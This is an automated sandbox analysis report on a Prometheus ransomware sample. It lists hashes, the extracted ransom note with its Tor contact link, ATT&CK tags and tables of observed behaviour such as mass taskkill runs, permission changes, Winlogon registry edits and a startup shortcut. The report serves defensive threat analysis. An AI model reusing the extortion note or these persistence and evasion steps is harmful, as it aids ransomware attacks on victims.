prometheus | 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b

Analysis

max time kernel
28s
max time network
41s
platform
windows7_x64
resource
win7v20210408
submitted
28-05-2021 09:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
Size

123KB
MD5

14de196b28bc12b5e571ea8303668041
SHA1

7f400d518bd716e75c795de47e1dc67f9d29d582
SHA256

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b
SHA512

1fe6f312057ca6debe2552f02c231cacff60f79fc40c053c26500f58fe4575fd4c820883bb4203ead2e9db00402883389d72853f304d3e198a333ef49e387b6f

Score

10^/10

prometheus discovery evasion persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Family

prometheus

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=54Z-YAD-AWLD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: ip6bxk+77ZwfuclffzttFPXqFD6ZGcjoS8uYq00Lw2JEZ+1xaMQ9aFxtlgu7ar9Q7SiU7JJuIqgO0Cc4haSjjSrIJspU2YAt9ef+42tj+M311wKYxpaII5w6NsEw4nnNMsZf0CQ0QBtKj32vjrXOOfwrRWhjWepf2uObPHeaG0N4Y5IbDqTiDjZxuJAGZ1jQDnQUtqo/Nx8oaj2WV8xDteg0qJ6fABWmewtph4H6YaDMWAdvVozKKgjF4uK4h6hjdUguMc1d3+A/b4l971ty3JSCuUIJUCLId75vyyUkcSU8vi9JZ+PHVTPEmmpiI/5sV5WpSrLoL6GnjwzITcjCztenux5d7Kb2BzT3Du/YU/cH8odHYNXfE4GYeSrWKWgbvRjeIxzRz2vF7OE/yPqGT3TFq72kCVt8kgCpR0bSxk83Da4DXkHt1zai6wogVohtrR2tMLD3Uv8KgC53wXV9GbYXW/DBCG+JrM1f60Op7V0vl++I9vLS2drhu22aJDswnNWgsHKinXQNJV0q8Zua/RAD5tutyMDh/cUMXhCtL648/5iHIk9+MiirCbf7faNE2IEv18XibrspLUO3CUizb65OrlWQVcgQ0H8LOqqnNkfpXfd8yN1pAuzOzQIdRfHV/7UrG87eV1OwyKljFrJYobEa5o6W54SDYE2/A6JV5vg=

URLs

http://promethw27cbrcot.onion/ticket.php?track=54Z-YAD-AWLD

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Family

prometheus

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after itâ€™s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=54Z-YAD-AWLD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: ip6bxk+77ZwfuclffzttFPXqFD6ZGcjoS8uYq00Lw2JEZ+1xaMQ9aFxtlgu7ar9Q7SiU7JJuIqgO0Cc4haSjjSrIJspU2YAt9ef+42tj+M311wKYxpaII5w6NsEw4nnNMsZf0CQ0QBtKj32vjrXOOfwrRWhjWepf2uObPHeaG0N4Y5IbDqTiDjZxuJAGZ1jQDnQUtqo/Nx8oaj2WV8xDteg0qJ6fABWmewtph4H6YaDMWAdvVozKKgjF4uK4h6hjdUguMc1d3+A/b4l971ty3JSCuUIJUCLId75vyyUkcSU8vi9JZ+PHVTPEmmpiI/5sV5WpSrLoL6GnjwzITcjCztenux5d7Kb2BzT3Du/YU/cH8odHYNXfE4GYeSrWKWgbvRjeIxzRz2vF7OE/yPqGT3TFq72kCVt8kgCpR0bSxk83Da4DXkHt1zai6wogVohtrR2tMLD3Uv8KgC53wXV9GbYXW/DBCG+JrM1f60Op7V0vl++I9vLS2drhu22aJDswnNWgsHKinXQNJV0q8Zua/RAD5tutyMDh/cUMXhCtL648/5iHIk9+MiirCbf7faNE2IEv18XibrspLUO3CUizb65OrlWQVcgQ0H8LOqqnNkfpXfd8yN1pAuzOzQIdRfHV/7UrG87eV1OwyKljFrJYobEa5o6W54SDYE2/A6JV5vg=

URLs

http://promethw27cbrcot.onion/ticket.php?track=54Z-YAD-AWLD

Signatures

Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
ransomware prometheus
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Deletes itself 1 IoCs

Processes:

cmd.exe

pid	Process
484	cmd.exe

Drops startup file 1 IoCs

Processes:

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

Modifies file permissions 1 TTPs 3 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid	Process
756	icacls.exe
1304	icacls.exe
820	icacls.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
940	taskkill.exe
592	taskkill.exe
1484	taskkill.exe
960	taskkill.exe
852	taskkill.exe
1080	taskkill.exe
1464	taskkill.exe
1560	taskkill.exe
1816	taskkill.exe
1804	taskkill.exe
1044	taskkill.exe
1724	taskkill.exe
1848	taskkill.exe
548	taskkill.exe
1904	taskkill.exe
948	taskkill.exe
1048	taskkill.exe
1800	taskkill.exe
1268	taskkill.exe
1784	taskkill.exe
1692	taskkill.exe
1832	taskkill.exe
1328	taskkill.exe
2004	taskkill.exe
1392	taskkill.exe
1972	taskkill.exe
684	taskkill.exe
1908	taskkill.exe
1604	taskkill.exe
852	taskkill.exe
1516	taskkill.exe
952	taskkill.exe
1512	taskkill.exe
1824	taskkill.exe
1044	taskkill.exe
1824	taskkill.exe
1956	taskkill.exe
1488	taskkill.exe
1624	taskkill.exe
1036	taskkill.exe
1812	taskkill.exe
1060	taskkill.exe
660	taskkill.exe
608	taskkill.exe
240	taskkill.exe
2004	taskkill.exe
516	taskkill.exe
1520	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
516	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
1680	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

pid	Process
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
Token: SeDebugPrivilege	852	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	2004	taskkill.exe
Token: SeDebugPrivilege	1044	taskkill.exe
Token: SeDebugPrivilege	1908	taskkill.exe
Token: SeDebugPrivilege	608	taskkill.exe
Token: SeDebugPrivilege	948	taskkill.exe
Token: SeDebugPrivilege	1724	taskkill.exe
Token: SeDebugPrivilege	1048	taskkill.exe
Token: SeDebugPrivilege	240	taskkill.exe
Token: SeDebugPrivilege	1392	taskkill.exe
Token: SeDebugPrivilege	1604	taskkill.exe
Token: SeDebugPrivilege	852	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	1848	taskkill.exe
Token: SeDebugPrivilege	1800	taskkill.exe
Token: SeDebugPrivilege	548	taskkill.exe
Token: SeDebugPrivilege	1464	taskkill.exe
Token: SeDebugPrivilege	1080	taskkill.exe
Token: SeDebugPrivilege	1784	taskkill.exe
Token: SeDebugPrivilege	1268	taskkill.exe
Token: SeDebugPrivilege	940	taskkill.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	592	taskkill.exe
Token: SeDebugPrivilege	516	taskkill.exe
Token: SeDebugPrivilege	1804	taskkill.exe
Token: SeDebugPrivilege	1484	taskkill.exe
Token: SeDebugPrivilege	1516	taskkill.exe
Token: SeDebugPrivilege	952	taskkill.exe
Token: SeDebugPrivilege	1520	taskkill.exe
Token: SeDebugPrivilege	1036	taskkill.exe
Token: SeDebugPrivilege	960	taskkill.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	1512	taskkill.exe
Token: SeDebugPrivilege	2004	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: SeDebugPrivilege	684	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	1044	taskkill.exe
Token: SeDebugPrivilege	660	taskkill.exe
Token: SeDebugPrivilege	1904	taskkill.exe
Token: SeDebugPrivilege	1692	taskkill.exe
Token: SeDebugPrivilege	1832	taskkill.exe
Token: SeDebugPrivilege	1328	taskkill.exe
Token: SeDebugPrivilege	1488	taskkill.exe
Token: SeDebugPrivilege	2032	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

pid	Process
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

pid	Process
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

description	pid	Process	procid_target
PID 1052 wrote to memory of 852	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	31
PID 1052 wrote to memory of 852	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	31
PID 1052 wrote to memory of 852	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	31
PID 1052 wrote to memory of 852	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	31
PID 1052 wrote to memory of 1812	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	33
PID 1052 wrote to memory of 1812	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	33
PID 1052 wrote to memory of 1812	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	33
PID 1052 wrote to memory of 1812	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	33
PID 1052 wrote to memory of 516	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	35
PID 1052 wrote to memory of 516	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	35
PID 1052 wrote to memory of 516	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	35
PID 1052 wrote to memory of 516	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	35
PID 1052 wrote to memory of 2032	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	37
PID 1052 wrote to memory of 2032	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	37
PID 1052 wrote to memory of 2032	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	37
PID 1052 wrote to memory of 2032	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	37
PID 1052 wrote to memory of 820	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	39
PID 1052 wrote to memory of 820	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	39
PID 1052 wrote to memory of 820	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	39
PID 1052 wrote to memory of 820	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	39
PID 1052 wrote to memory of 960	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	42
PID 1052 wrote to memory of 960	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	42
PID 1052 wrote to memory of 960	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	42
PID 1052 wrote to memory of 960	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	42
PID 1052 wrote to memory of 592	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	40
PID 1052 wrote to memory of 592	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	40
PID 1052 wrote to memory of 592	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	40
PID 1052 wrote to memory of 592	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	40
PID 1052 wrote to memory of 1080	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	45
PID 1052 wrote to memory of 1080	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	45
PID 1052 wrote to memory of 1080	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	45
PID 1052 wrote to memory of 1080	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	45
PID 1052 wrote to memory of 1804	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	46
PID 1052 wrote to memory of 1804	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	46
PID 1052 wrote to memory of 1804	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	46
PID 1052 wrote to memory of 1804	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	46
PID 1052 wrote to memory of 1956	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	49
PID 1052 wrote to memory of 1956	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	49
PID 1052 wrote to memory of 1956	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	49
PID 1052 wrote to memory of 1956	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	49
PID 1052 wrote to memory of 1820	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	51
PID 1052 wrote to memory of 1820	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	51
PID 1052 wrote to memory of 1820	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	51
PID 1052 wrote to memory of 1820	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	51
PID 1052 wrote to memory of 1996	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	53
PID 1052 wrote to memory of 1996	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	53
PID 1052 wrote to memory of 1996	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	53
PID 1052 wrote to memory of 1996	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	53
PID 1052 wrote to memory of 932	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	54
PID 1052 wrote to memory of 932	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	54
PID 1052 wrote to memory of 932	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	54
